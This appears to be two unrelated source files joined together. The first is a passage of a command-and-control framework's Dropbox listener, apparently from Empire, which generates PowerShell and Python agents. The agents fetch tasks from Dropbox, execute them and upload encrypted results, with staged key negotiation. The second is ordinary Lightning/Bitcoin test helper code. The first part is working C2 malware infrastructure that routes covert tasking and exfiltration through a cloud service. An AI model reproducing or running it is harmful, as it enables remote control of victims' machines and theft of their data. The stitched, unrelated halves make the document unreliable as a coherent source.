"staging_key": stagingKey,
"profile": profile,
"api_token": apiToken,
}
stager = template.render(template_options)
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(
RC4IV + stagingKey.encode("UTF-8"), stager.encode("UTF-8")
)
else:
# otherwise return the standard stager
return stager
else:
print(
helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."
)
)
def generate_agent(
self,
listenerOptions,
language=None,
obfuscate=False,
obfuscationCommand="",
version="",
):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(
helpers.color(
"[!] listeners/dbx generate_agent(): no language specified!"
)
)
return None
language = language.lower()
delay = listenerOptions["DefaultDelay"]["Value"]
jitter = listenerOptions["DefaultJitter"]["Value"]
profile = listenerOptions["DefaultProfile"]["Value"]
lostLimit = listenerOptions["DefaultLostLimit"]["Value"]
workingHours = listenerOptions["WorkingHours"]["Value"]
killDate = listenerOptions["KillDate"]["Value"]
b64DefaultResponse = base64.b64encode(self.default_response().encode("UTF-8"))
if language == "powershell":
with open(self.mainMenu.installPath + "/data/agent/agent.ps1") as f:
code = f.read()
# patch in the comms methods
commsCode = self.generate_comms(
listenerOptions=listenerOptions, language=language
)
code = code.replace("REPLACE_COMMS", commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace("$AgentDelay = 60", "$AgentDelay = " + str(delay))
code = code.replace("$AgentJitter = 0", "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'$Profile = "' + str(profile) + '"',
)
code = code.replace("$LostLimit = 60", "$LostLimit = " + str(lostLimit))
code = code.replace(
'$DefaultResponse = ""',
'$DefaultResponse = "' + b64DefaultResponse.decode("UTF-8") + '"',
)
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace(
"$KillDate,", "$KillDate = '" + str(killDate) + "',"
)
return code
elif language == "python":
if version == "ironpython":
f = open(self.mainMenu.installPath + "/data/agent/ironpython_agent.py")
else:
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# path in the comms methods
commsCode = self.generate_comms(
listenerOptions=listenerOptions, language=language
)
code = code.replace("REPLACE_COMMS", commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch some more
code = code.replace("delay = 60", "delay = %s" % (delay))
code = code.replace("jitter = 0.0", "jitter = %s" % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile),
)
code = code.replace("lostLimit = 60", "lostLimit = %s" % (lostLimit))
code = code.replace(
'defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")'
% (b64DefaultResponse.decode("UTF-8")),
)
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace(
'workingHours = ""', 'workingHours = "%s"' % (killDate)
)
return code
else:
print(
helpers.color(
"[!] listeners/dbx generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."
)
)
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
stagingKey = listenerOptions["StagingKey"]["Value"]
pollInterval = listenerOptions["PollInterval"]["Value"]
apiToken = listenerOptions["APIToken"]["Value"]
baseFolder = listenerOptions["BaseFolder"]["Value"].strip("/")
taskingsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["TaskingsFolder"]["Value"].strip("/"),
)
resultsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["ResultsFolder"]["Value"].strip("/"),
)
if language:
if language.lower() == "powershell":
updateServers = f'$Script:APIToken = "{apiToken}";'
getTask = f"""
$script:GetTask = {{
try {{
# build the web request object
$wc= New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {{
$wc.Proxy = $Script:Proxy;
}}
$wc.Headers.Add("User-Agent", $script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {{$wc.Headers.Add($_.Name, $_.Value)}}
$TaskingsFolder = '{taskingsFolder}'
$wc.Headers.Set("Authorization", "Bearer $($Script:APIToken)")
$wc.Headers.Set("Dropbox-API-Arg", "{{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}}")
$Data = $wc.DownloadData("https://content.dropboxapi.com/2/files/download")
if($Data -and ($Data.Length -ne 0)) {{
# if there was a tasking data, remove it
$wc.Headers.Add("Content-Type", " application/json")
$wc.Headers.Remove("Dropbox-API-Arg")
$Null=$wc.UploadString("https://api.dropboxapi.com/2/files/delete", "POST", "{{`"path`":`"$TaskingsFolder/$($script:SessionID).txt`"}}")
$Data
}}
$script:MissedCheckins = 0
}}
catch {{
if ($_ -match 'Unable to connect') {{
$script:MissedCheckins += 1
}}
}}
}}
"""
sendMessage = f"""
$script:SendMessage = {{
param($Packets)
if($Packets) {{
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {{
$wc.Proxy = $Script:Proxy;
}}
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {{$wc.Headers.Add($_.Name, $_.Value)}}
$ResultsFolder = '{resultsFolder}'
try {{
# check if the results file is still in the specified location, if so then
# download the file and append the new routing packet to it
try {{
$Data = $Null
$wc.Headers.Set("Authorization", "Bearer $($Script:APIToken)");
$wc.Headers.Set("Dropbox-API-Arg", "{{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}}");
$Data = $wc.DownloadData("https://content.dropboxapi.com/2/files/download")
}}
catch {{ }}
if($Data -and $Data.Length -ne 0) {{
$RoutingPacket = $Data + $RoutingPacket
}}
$wc2 = New-Object System.Net.WebClient
$wc2.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc2.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {{
$wc2.Proxy = $Script:Proxy;
}}
$wc2.Headers.Add("Authorization", "Bearer $($Script:APIToken)")
$wc2.Headers.Add("Content-Type", "application/octet-stream")
$wc2.Headers.Add("Dropbox-API-Arg", "{{`"path`":`"$ResultsFolder/$($script:SessionID).txt`"}}");
$Null = $wc2.UploadData("https://content.dropboxapi.com/2/files/upload", "POST", $RoutingPacket)
$script:MissedCheckins = 0
}}
catch {{
if ($_ -match 'Unable to connect') {{
$script:MissedCheckins += 1
}}
}}
}}
}}
"""
return updateServers + getTask + sendMessage
elif language.lower() == "python":
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
def post_message(uri, data, headers):
req = urllib.request.urlopen(uri)
headers['Authorization'] = "Bearer REPLACE_API_TOKEN"
for key, value in headers.items():
req.add_header("%s"%(key),"%s"%(value))
if data:
req.add_data(data)
o=urllib.request.build_opener()
o.add_handler(urllib.request.ProxyHandler(urllib.request.getproxies()))
urllib.request.install_opener(o)
return urllib.request.urlopen(req).read()
global missedCheckins
global headers
taskingsFolder="REPLACE_TASKSING_FOLDER"
resultsFolder="REPLACE_RESULTS_FOLDER"
data = None
requestUri=''
try:
del headers['Content-Type']
except:
pass
if packets:
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, packets)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
#check to see if there are any results already present
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
try:
pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
except:
pkdata = None
if pkdata and len(pkdata) > 0:
data = pkdata + data
headers['Content-Type'] = "application/octet-stream"
requestUri = 'https://content.dropboxapi.com/2/files/upload'
else:
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
requestUri='https://content.dropboxapi.com/2/files/download'
try:
resultdata = post_message(requestUri, data, headers)
if (resultdata and len(resultdata) > 0) and requestUri.endswith('download'):
headers['Content-Type'] = "application/json"
del headers['Dropbox-API-Arg']
datastring="{\\"path\\":\\"%s/%s.txt\\"}" % (taskingsFolder, sessionID)
nothing = post_message('https://api.dropboxapi.com/2/files/delete', datastring, headers)
return ('200', resultdata)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
sendMessage = sendMessage.replace(
"REPLACE_TASKSING_FOLDER", taskingsFolder
)
sendMessage = sendMessage.replace(
"REPLACE_RESULTS_FOLDER", resultsFolder
)
sendMessage = sendMessage.replace("REPLACE_API_TOKEN", apiToken)
return sendMessage
else:
print(
helpers.color(
"[!] listeners/dbx generate_comms(): no language specified!"
)
)
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up polling server for Dropbox
polling communication.
./Empire/
./staging/
stager.ps1
SESSION_[1-4].txt
./taskings/
SESSIONID.txt
./results/
SESSIONID.txt
/Empire/staging/stager.ps1 -> RC4staging(stager.ps1) uploaded by server
/Empire/staging/sessionID_1.txt -> AESstaging(PublicKey) uploaded by client
/Empire/staging/sessionID_2.txt -> RSA(nonce+AESsession) uploaded by server
/Empire/staging/sessionID_3.txt -> AESsession(nonce+sysinfo) uploaded by client
/Empire/staging/sessionID_4.txt -> AESsession(agent.ps1) uploaded by server
client dropbox server
<- upload /Empire/staging/stager.ps1
read /Empire/staging/stager ->
<- return stager
generate sessionID
upload /Empire/staging/sessionID_1.txt ->
<- read /Empire/staging/sessionID_1.txt
<- upload /Empire/staging/sessionID_2.txt
read /Empire/staging/sessionID_2.txt ->
<- /Empire/staging/sessionID_2.txt
upload /Empire/staging/sessionID_3.txt ->
<- read /Empire/staging/sessionID_3.txt
<- upload /Empire/staging/sessionID_4.txt
read /Empire/staging/sessionID_4.txt ->
<- /Empire/staging/sessionID_4.txt
<start beaconing>
<- upload /Empire/taskings/sessionID.txt
read /Empire/taskings/sessionID.txt ->
<- /Empire/taskings/sessionID.txt
delete /Empire/taskings/sessionID.txt ->
execute code
upload /Empire/results/sessionID.txt ->
<- read /Empire/results/sessionID.txt
<- delete /Empire/results/sessionID.txt
"""
def download_file(dbx, path):
# helper to download a file at the given path
try:
md, res = dbx.files_download(path)
except dropbox.exceptions.HttpError as err:
listenerName = self.options["Name"]["Value"]
message = "[!] Error downloading data from '{}' : {}".format(path, err)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
return None
return res.content
def upload_file(dbx, path, data):
# helper to upload a file to the given path
try:
dbx.files_upload(data, path)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[!] Error uploading data to '{}'".format(path)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
def delete_file(dbx, path):
# helper to delete a file at the given path
try:
dbx.files_delete(path)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[!] Error deleting data at '{}'".format(path)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
stagingKey = listenerOptions["StagingKey"]["Value"]
pollInterval = listenerOptions["PollInterval"]["Value"]
apiToken = listenerOptions["APIToken"]["Value"]
listenerName = listenerOptions["Name"]["Value"]
baseFolder = listenerOptions["BaseFolder"]["Value"].strip("/")
stagingFolder = "/%s/%s" % (
baseFolder,
listenerOptions["StagingFolder"]["Value"].strip("/"),
)
taskingsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["TaskingsFolder"]["Value"].strip("/"),
)
resultsFolder = "/%s/%s" % (
baseFolder,
listenerOptions["ResultsFolder"]["Value"].strip("/"),
)
dbx = dropbox.Dropbox(apiToken)
# ensure that the access token supplied is valid
try:
dbx.users_get_current_account()
except dropbox.exceptions.AuthError as err:
print(
helpers.color(
"[!] ERROR: Invalid access token; try re-generating an access token from the app console on the web."
)
)
return False
# setup the base folder structure we need
try:
dbx.files_create_folder(stagingFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[*] Dropbox folder '{}' already exists".format(stagingFolder)
signal = json.dumps({"print": False, "message": message})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(taskingsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[*] Dropbox folder '{}' already exists".format(taskingsFolder)
signal = json.dumps({"print": False, "message": message})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
try:
dbx.files_create_folder(resultsFolder)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[*] Dropbox folder '{}' already exists".format(resultsFolder)
signal = json.dumps({"print": False, "message": message})
dispatcher.send(signal, sender="listeners/dropbox/{}".format(listenerName))
# upload the stager.ps1 code
stagerCodeps = self.generate_stager(
listenerOptions=listenerOptions, language="powershell"
)
stagerCodepy = self.generate_stager(
listenerOptions=listenerOptions, language="python"
)
try:
# delete stager if it exists
delete_file(dbx, "%s/debugps" % (stagingFolder))
delete_file(dbx, "%s/debugpy" % (stagingFolder))
dbx.files_upload(stagerCodeps, "%s/debugps" % (stagingFolder))
dbx.files_upload(stagerCodepy, "%s/debugpy" % (stagingFolder))
except dropbox.exceptions.ApiError:
print(
helpers.color(
"[!] Error uploading stager to '%s/stager'" % (stagingFolder)
)
)
return
while True:
time.sleep(int(pollInterval))
# search for anything in /Empire/staging/*
for match in dbx.files_search(stagingFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
relName = fileName.split("/")[-1][:-4]
sessionID, stage = relName.split("_")
sessionID = sessionID.upper()
if "_" in relName:
if stage == "1":
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error downloading data from '{}' : {}".format(
fileName, err
)
)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(listenerName),
)
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(
stagingKey, stageData, listenerOptions
)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
# TODO: more error checking
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[!] Error deleting data at '{}'".format(
fileName
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
try:
stageName = "%s/%s_2.txt" % (
stagingFolder,
sessionID,
)
listenerName = self.options["Name"]["Value"]
message = "[*] Uploading key negotiation part 2 to {} for {}".format(
stageName, sessionID
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
dbx.files_upload(results, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[!] Error uploading data to '{}'".format(
stageName
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
if stage == "3":
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error downloading data from '{}' : {}".format(
fileName, err
)
)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(listenerName),
)
continue
stageData = res.content
dataResults = self.mainMenu.agents.handle_agent_data(
stagingKey, stageData, listenerOptions
)
if dataResults and len(dataResults) > 0:
# print "dataResults:",dataResults
for (language, results) in dataResults:
if results.startswith("STAGE2"):
sessionKey = self.mainMenu.agents.agents[sessionID][
"sessionKey"
]
listenerName = self.options["Name"]["Value"]
message = "[*] Sending agent (stage 2) to {} through Dropbox".format(
sessionID
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error deleting data at '{}'".format(
fileName
)
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
try:
fileName2 = fileName.replace(
"%s_3.txt" % (sessionID),
"%s_2.txt" % (sessionID),
)
dbx.files_delete(fileName2)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error deleting data at '{}'".format(
fileName2
)
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
session_info = (
Session()
.query(models.Agent)
.filter(models.Agent.session_id == sessionID)
.first()
)
if session_info.language == "ironpython":
version = "ironpython"
else:
version = ""
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(
language=language,
listenerOptions=listenerOptions,
version=version,
)
returnResults = encryption.aes_encrypt_then_hmac(
sessionKey, agentCode
)
try:
stageName = "%s/%s_4.txt" % (
stagingFolder,
sessionID,
)
listenerName = self.options["Name"]["Value"]
message = "[*] Uploading key negotiation part 4 (agent) to {} for {}".format(
stageName, sessionID
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
dbx.files_upload(returnResults, stageName)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error uploading data to '{}'".format(
stageName
)
)
signal = json.dumps(
{"print": True, "message": message}
)
dispatcher.send(
signal,
sender="listeners/dropbox/{}".format(
listenerName
),
)
# get any taskings applicable for agents linked to this listener
sessionIDs = self.mainMenu.agents.get_agents_for_listener(listenerName)
for x in range(len(sessionIDs)):
if isinstance(sessionIDs[x], bytes):
sessionIDs[x] = sessionIDs[x].decode("UTF-8")
for sessionID in sessionIDs:
taskingData = self.mainMenu.agents.handle_agent_request(
sessionID, "powershell", stagingKey
)
if taskingData:
try:
taskingFile = "%s/%s.txt" % (taskingsFolder, sessionID)
# if the tasking file still exists, download/append + upload again
existingData = None
try:
md, res = dbx.files_download(taskingFile)
existingData = res.content
except:
existingData = None
if existingData:
taskingData = taskingData + existingData
listenerName = self.options["Name"]["Value"]
message = "[*] Uploading agent tasks for {} to {}".format(
sessionID, taskingFile
)
signal = json.dumps({"print": False, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
dbx.files_upload(
taskingData,
taskingFile,
mode=dropbox.files.WriteMode.overwrite,
)
except dropbox.exceptions.ApiError as e:
listenerName = self.options["Name"]["Value"]
message = (
"[!] Error uploading agent tasks for {} to {} : {}".format(
sessionID, taskingFile, e
)
)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
# check for any results returned
for match in dbx.files_search(resultsFolder, "*.txt").matches:
fileName = str(match.metadata.path_display)
sessionID = fileName.split("/")[-1][:-4]
listenerName = self.options["Name"]["Value"]
message = "[*] Downloading data for '{}' from {}".format(
sessionID, fileName
)
signal = json.dumps({"print": False, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
try:
md, res = dbx.files_download(fileName)
except dropbox.exceptions.HttpError as err:
listenerName = self.options["Name"]["Value"]
message = "[!] Error download data from '{}' : {}".format(
fileName, err
)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
continue
responseData = res.content
try:
dbx.files_delete(fileName)
except dropbox.exceptions.ApiError:
listenerName = self.options["Name"]["Value"]
message = "[!] Error deleting data at '{}'".format(fileName)
signal = json.dumps({"print": True, "message": message})
dispatcher.send(
signal, sender="listeners/dropbox/{}".format(listenerName)
)
self.mainMenu.agents.handle_agent_data(
stagingKey, responseData, listenerOptions
)
def start(self, name=""):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != "":
self.threads[name] = helpers.KThread(
target=self.start_server, args=(listenerOptions,)
)
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions["Name"]["Value"]
self.threads[name] = helpers.KThread(
target=self.start_server, args=(listenerOptions,)
)
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=""):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != "":
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(
helpers.color(
"[!] Killing listener '%s'" % (self.options["Name"]["Value"])
)
)
self.threads[self.options["Name"]["Value"]].kill()
|
utils.py
|
from bitcoin.core import COIN # type: ignore
from bitcoin.rpc import RawProxy as BitcoinProxy # type: ignore
from bitcoin.rpc import JSONRPCError
from contextlib import contextmanager
from pathlib import Path
from pyln.client import RpcError
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve # type: ignore
from pyln.client import LightningRpc
from pyln.client import Millisatoshi
import json
import logging
import lzma
import math
import os
import psutil # type: ignore
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
import warnings
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
"fallbackfee": Decimal(1000) / COIN,
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
FUNDAMOUNT = 10**6
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
DEPRECATED_APIS = env("DEPRECATED_APIS", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
EXPERIMENTAL_DUAL_FUND = env("EXPERIMENTAL_DUAL_FUND", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
raise ValueError("Timeout while waiting for {}", success)
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
self.err_logs = []
self.prefix = ""
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
line = line.decode('UTF-8', 'replace').rstrip()
if self.log_filter(line):
continue
if self.verbose:
sys.stdout.write("{}: {}\n".format(self.prefix, line))
with self.logs_cond:
self.logs.append(line)
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
for line in iter(self.proc.stderr.readline, ''):
if line is None or len(line) == 0:
break
line = line.rstrip().decode('UTF-8', 'replace')
self.err_logs.append(line)
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def is_in_stderr(self, regex):
"""Look for `regex` in stderr."""
ex = re.compile(regex)
for l in self.err_logs:
if ex.search(l):
logging.debug("Found '%s' in stderr", regex)
return l
logging.debug("Did not find '%s' in stderr", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
with self.logs_cond:
if pos >= len(self.logs):
if not self.running:
raise ValueError('Process died while waiting for logs')
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
logging.debug("Calling {name} with arguments {args}".format(
name=name,
args=args
))
res = proxy._call(name, *args)
logging.debug("Result for {name} call: {res}".format(
name=name,
res=res,
))
return res
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
